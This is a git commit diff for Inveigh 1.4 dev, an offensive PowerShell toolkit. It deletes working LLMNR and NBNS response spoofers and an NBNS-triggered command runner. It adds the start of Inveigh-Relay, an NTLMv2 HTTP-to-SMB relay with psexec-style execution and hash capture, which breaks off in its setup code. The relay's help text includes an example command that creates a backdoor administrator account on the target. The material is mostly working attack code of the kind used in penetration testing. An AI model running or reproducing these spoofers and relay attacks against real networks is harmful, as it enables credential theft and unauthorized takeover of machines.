authorKevin Robertson <robertsonk@gmail.com>2018-02-19 23:36:13 -0500
committerKevin Robertson <robertsonk@gmail.com>2018-02-19 23:36:13 -0500
commit43edf71b54567698d24d7c44ce3410120841b53a (patch)
tree978bae559d6ec42f76c1168f125704132e755b59
parent32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea (diff)
Inveigh 1.4 dev
This is an early version of Inveigh 1.4. There is probably a lot that is broken. Inveigh: 1. Invoke-DNSUpdate integration - Inveigh will attempt to inject DNS records if the same LLMNR/NBNS request is observed from multiple systems. The goal is to find requests that could be valid in other subnets and leverage them through DNS. This version requires that Inveigh is running with a domain auth user context. 2. Reworked output system and formatting. 3. hmm...I forget. Inveigh Relay: 1. New attack with Invoke-TheHash integration - In addition to the standard psexec style attack, Inveigh Relay now has the ability to create and maintain authenticated priv and unpriv SMB2 sessions. These sessions can be used by Invoke-SMBClient (attack file shares) and Invoke-SMBExec. Invoke-InveighRelay -Attack session -Target 10.10.10.10 wait for relay Get-Inveigh -session Invoke-SMBClient -Session 0 -Source \\10.10.10.10\share 2. Multitarget - Inveigh Relay will now accept an array of targets. As relay attempts come in, Inveigh Relay will attempt to select the best target (still needs work). 3. SMB signing check for targets on startup. 4. Reworked output system and formatting. I'm temporarily housing newer versions of Invoke-DNSUpdate, Invoke-SMBClient, and Invoke-SMBExec here. They need to be imported into the same powershell session for integration to work. There is also probably a lot broken with these.
-rw-r--r--Extras/Invoke-NBNSC2.ps1151
-rw-r--r--Extras/Send-LLMNRResponse.ps187
-rw-r--r--Extras/Send-NBNSResponse.ps1105
-rw-r--r--Inveigh-Relay.ps14677
-rw-r--r--Inveigh.ps1 (renamed from Scripts/Inveigh.ps1)1605
-rw-r--r--Inveigh.psd12
-rw-r--r--Inveigh.psm16
-rw-r--r--Invoke-DNSUpdate.ps11437
-rw-r--r--Invoke-SMBClient.ps12773
-rw-r--r--Invoke-SMBExec.ps12777
-rw-r--r--Scripts/Inveigh-Relay.ps14516
11 files changed, 12399 insertions, 5737 deletions
diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1
deleted file mode 100644
index 41d2e64..0000000
--- a/Extras/Invoke-NBNSC2.ps1
+++ /dev/null
@@ -1,151 +0,0 @@
-function Invoke-NBNSC2
-{
-<#
-.SYNOPSIS
-Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are
-received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be
-sent from a NBNS enabled system on the same subnet using ping, etc.
-
-.PARAMETER Hostnames
-A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command
-from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]).
-
-.PARAMETER Commands
-An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets.
-
-.PARAMETER ExitHostname
-Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames.
-
-.PARAMETER RunTime
-(Integer) Set the run time duration.
-
-.PARAMETER RunTimeUnit
-Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days.
-
-.EXAMPLE
-Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$true)][Array]$Hostnames = "",
-[parameter(Mandatory=$true)][Array]$Commands = "",
-[parameter(Mandatory=$true)][String]$ExitHostname = "",
-[parameter(Mandatory=$false)][Int]$RunTime="",
-[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if($Hostnames.Count -ne $Commands.Count)
-{
- throw "Must use an equal number of Hostnames and Commands."
-}
-elseif($Hostnames -contains $ExitHostname)
-{
- throw "ExitHostname cannot be used as in Hostnames."
-}
-
-if($RunTime)
-{
- if($RunTimeUnit -like 'Minutes')
- {
- $runtime_timeout = new-timespan -Minutes $RunTime
- }
- elseif($RunTimeUnit -like 'Hours')
- {
- $runtime_timeout = new-timespan -Hours $RunTime
- }
- elseif($RunTimeUnit -like 'Days')
- {
- $runtime_timeout = new-timespan -Days $RunTime
- }
-
- $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-}
-
-$Hostnames = $Hostnames | % {$_.ToUpper()}
-$running = $true
-$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
-$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
-$NBNS_UDP_client.Client.ReceiveTimeout = 10000
-$control_timeout = new-timespan -Seconds 1
-$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-
-while($running)
-{
- try
- {
- $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
- }
- catch
- {
- $NBNS_request_data = $null
- }
-
- if($NBNS_request_data)
- {
- $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
- $NBNS_query = $NBNS_query -replace "-00",""
- $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
- $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
- $NBNS_query_string_subtracted = ""
- $NBNS_query_string = ""
- $n = 0
-
- if($NBNS_query_string_encoded.Length -gt 1)
- {
- do
- {
- $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
- $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
- $n += 1
- }
- until($n -gt ($NBNS_query_string_encoded.Length - 1))
-
- $n = 0
-
- do
- {
- $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
- $n += 2
- }
- until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
- }
-
- if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout)
- {
- $NBNS_UDP_client.Close()
- $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string)
- $NBNS_query_string = ''
- & $Commands[$command_index]
- $control_timeout = new-timespan -Seconds 5
- $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
- $NBNS_UDP_client.Client.ReceiveTimeout = 10000
- }
- elseif($ExitHostname -like $NBNS_query_string)
- {
- $running = $false
- }
- }
-
- if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout)
- {
- $running = $false
- }
-
-}
-
-$NBNS_UDP_client.Close()
-
-} \ No newline at end of file
diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1
deleted file mode 100644
index cc22091..0000000
--- a/Extras/Send-LLMNRResponse.ps1
+++ /dev/null
@@ -1,87 +0,0 @@
-
-function Send-LLMNRResponse
-{
-<#
-.SYNOPSIS
-Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request.
-You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the
-target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response
-window. Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER LLMNRTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355
-which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine.
-
-.PARAMETER SpooferIP
-Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host.
-
-.PARAMETER TargetIP
-Specify an IP address to target for the LLMNR response.
-
-.PARAMETER TargetPort
-Specify an port to target for the LLMNR response. This port must match the source port included in the request.
-
-.EXAMPLE
-Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$true)][Int]$TargetPort="",
-[parameter(Mandatory=$false)][Int]$SendPort="0",
-[parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{
- $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
-[Array]::Reverse($LLMNR_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-$LLMNR_response_packet = $Transaction_ID_bytes +
- 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
- $hostname_bytes.Count +
- $hostname_bytes +
- 0x00,0x00,0x01,0x00,0x01 +
- $hostname_bytes.Count +
- $hostname_bytes +
- 0x00,0x00,0x01,0x00,0x01 +
- $LLMNR_TTL_bytes +
- 0x00,0x04 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort)
-$send_socket.Connect($destination_point)
-$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
-$send_socket.Close()
-} \ No newline at end of file
diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1
deleted file mode 100644
index 3d5ed02..0000000
--- a/Extras/Send-NBNSResponse.ps1
+++ /dev/null
@@ -1,105 +0,0 @@
-
-function Send-NBNSResponse
-{
-<#
-.SYNOPSIS
-Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must
-have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target
-subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been
-able to get it to work manually by watching tshark with the the transaction ID being listed in the output.
-Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER NBNSTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = 137: Specify a source port for the NBNS response.
-
-.PARAMETER SpooferIP
-IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host.
-
-.PARAMETER TargetIP
-IP address to target for the NBNS response.
-
-.PARAMETER TransactionID
-NBNS transaction ID that matches the transaction from the NBNS request.
-
-.EXAMPLE
-Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$false)][Int]$SendPort="137",
-[parameter(Mandatory=$false)][Int]$NBNSTTL="165",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{
- $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$Hostname = $Hostname.ToUpper()
-
-$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
- 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
-
-$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
-$hostname_encoded = $hostname_encoded.Replace("-","")
-$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
-$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
-[Array]::Reverse($NBNS_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-for($i=0; $i -lt $hostname_encoded.Count; $i++)
-{
-
- if($hostname_encoded[$i] -gt 64)
- {
- $hostname_bytes[$i] = $hostname_encoded[$i] + 10
- }
- else
- {
- $hostname_bytes[$i] = $hostname_encoded[$i] + 17
- }
-
-}
-
-$NBNS_response_packet = $Transaction_ID_bytes +
- 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
- $hostname_bytes +
- 0x00,0x20,0x00,0x01 +
- $NBNS_TTL_bytes +
- 0x00,0x06,0x00,0x00 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
- 0x00,0x00,0x00,0x00
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
-$send_socket.Connect($destination_point)
-$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
-$send_socket.Close()
-} \ No newline at end of file
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
new file mode 100644
index 0000000..49c5629
--- /dev/null
+++ b/Inveigh-Relay.ps1
@@ -0,0 +1,4677 @@
+function Invoke-InveighRelay
+{
+<#
+.SYNOPSIS
+Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution.
+
+.DESCRIPTION
+Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexec style command execution.
+
+ HTTP/HTTPS to SMB NTLMv2 relay with granular control
+ Supports SMB1 and SMB2 targets
+ Does not require priveleged access on the Invoke-InveighRelay host
+ The Invoke-InveighRelay host can be targeted for privilege escalation
+ NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
+ Granular control of console and file output
+
+.PARAMETER Attack
+Default = Execute: (Execute/Session) Attack to perform with relay. Execute performs PSExec style command execution.
+Session creates and maintains autneticated SMB sessions that can be interacted with through Invoke-TheHash's
+Invoke-SMBClient and Invoke-SMBExec.
+
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+pulled from the SMB relay target.
+
+.PARAMETER Command
+Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER ConsoleOutput
+Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a
+shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
+
+.PARAMETER ConsoleQueueLimit
+Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileOutputDirectory
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
+
+.PARAMETER HTTP
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+
+.PARAMETER HTTPIP
+Default = Any: IP address for the HTTP/HTTPS listener.
+
+.PARAMETER HTTPPort
+Default = 80: TCP port for the HTTP listener.
+
+.PARAMETER HTTPS
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
+local administrator access.
+
+.PARAMETER HTTPSPort
+Default = 443: TCP port for the HTTPS listener.
+
+.PARAMETER HTTPSCertIssuer
+Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSCertSubject
+Default = localhost: The subject field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSForceCertDelete
+Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and
+HTTPSCertSubject.
+
+.PARAMETER HTTPResetDelay
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the
+chance of capturing/relaying authentication through a popup box with some browsers (Firefox).
+
+.PARAMETER HTTPResetDelayTimeout
+Default = 30 Seconds: HTTPResetDelay timeout in seconds.
+
+.PARAMETER LogOutput
+Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
+
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
+various yellow warning messages if enabled.
+
+.PARAMETER ProxyRelay
+Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication.
+
+.PARAMETER ProxyIP
+Default = Any: IP address for the proxy listener.
+
+.PARAMETER ProxyPort
+Default = 8182: TCP port for the proxy listener.
+
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening.
+
+.PARAMETER RelayAutoDisable
+Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
+target.
+
+.PARAMETER RelayAutoExit
+Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
+
+.PARAMETER RunTime
+(Integer) Run time duration in minutes.
+
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
+.PARAMETER SMB1
+(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
+target.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER Target
+IP address of system to target for SMB relay.
+
+.PARAMETER Tool
+Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
+
+.PARAMETER Username
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADAuthIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
+popups for authenticated wpad.dat requests such as Firefox.
+
+.EXAMPLE
+Invoke-Inveigh -HTTP N
+Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+# Parameter default values can be modified in this section:
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
+ [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
+ [parameter(Mandatory=$false)][Array]$Username = "",
+ [parameter(Mandatory=$false)][Array]$UsernameAlwaysAllow = "Administrator",
+ [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+ [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
+ [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
+ [parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
+ [parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$SessionLimit = "2",
+ [parameter(Mandatory=$false)][Int]$SessionRefresh = "10",
+ [parameter(Mandatory=$false)][Object]$Source,
+ [parameter(Mandatory=$false)][String]$Command = "",
+ [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
+ [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
+ [parameter(Mandatory=$false)][String]$Service,
+ [parameter(Mandatory=$true)][Array]$Target = "",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SessionPriority = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SigningCheck = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Session","Execute")][String]$Attack = "Execute",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Switch]$SMB1,
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+ Write-Output "[-] $($invalid_parameter) is not a valid parameter."
+ throw
+}
+
+$inveigh_version = "1.4 Dev"
+
+if($ProxyIP -eq '0.0.0.0')
+{
+ $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+}
+
+if($Attack -eq 'Execute' -and !$Command)
+{
+ Write-Output "[-] -Command requiried with -Attack Execute"
+ throw
+}
+
+if(!$FileOutputDirectory)
+{
+ $output_directory = $PWD.Path
+}
+else
+{
+ $output_directory = $FileOutputDirectory
+}
+
+if(!$inveigh)
+{
+ $global:inveigh = [HashTable]::Synchronized(@{})
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+ $inveigh.log = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_list = New-Object System.Collections.ArrayList
+ $inveigh.relay_list = New-Object System.Collections.ArrayList
+ $inveigh.relay_user_failed_list = New-Object System.Collections.ArrayList
+ $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.session_list = @()
+ $inveigh.session_socket_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_count = 0
+}
+
+if($inveigh.relay_running)
+{
+ Write-Output "[-] Inveigh Relay is already running"
+ throw
+}
+
+if(!$inveigh.running)
+{
+ $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.console_queue = New-Object System.Collections.ArrayList
+ $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+ $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.output_queue = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.status_queue = New-Object System.Collections.ArrayList
+ $inveigh.console_input = $true
+ $inveigh.console_output = $false
+ $inveigh.file_output = $false
+ $inveigh.HTTPS_existing_certificate = $false
+ $inveigh.HTTPS_force_certificate_delete = $false
+ $inveigh.log_output = $true
+ $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+ $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+ $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+ $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+ $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
+}
+
+$inveigh.target_list = New-Object System.Collections.ArrayList
+
+ForEach($target_entry in $Target)
+{
+ $inveigh.target_list.Add($target_entry) > $null
+}
+
+if($StartupChecks -eq 'Y')
+{
+
+ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+
+ if($HTTP -eq 'Y')
+ {
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
+ }
+
+ if($HTTPS -eq 'Y')
+ {
+ $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
+ }
+
+ if($Proxy -eq 'Y')
+ {
+ $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
+ }
+
+}
+
+$inveigh.relay_running = $true
+$inveigh.SMB_relay = $true
+
+if($StatusOutput -eq 'Y')
+{
+ $inveigh.status_output = $true
+}
+else
+{
+ $inveigh.status_output = $false
+}
+
+if($OutputStreamOnly -eq 'Y')
+{
+ $inveigh.output_stream_only = $true
+}
+else
+{
+ $inveigh.output_stream_only = $false
+}
+
+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
+{
+ $inveigh.tool = 1
+ $inveigh.output_stream_only = $true
+ $inveigh.newline = ""
+ $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
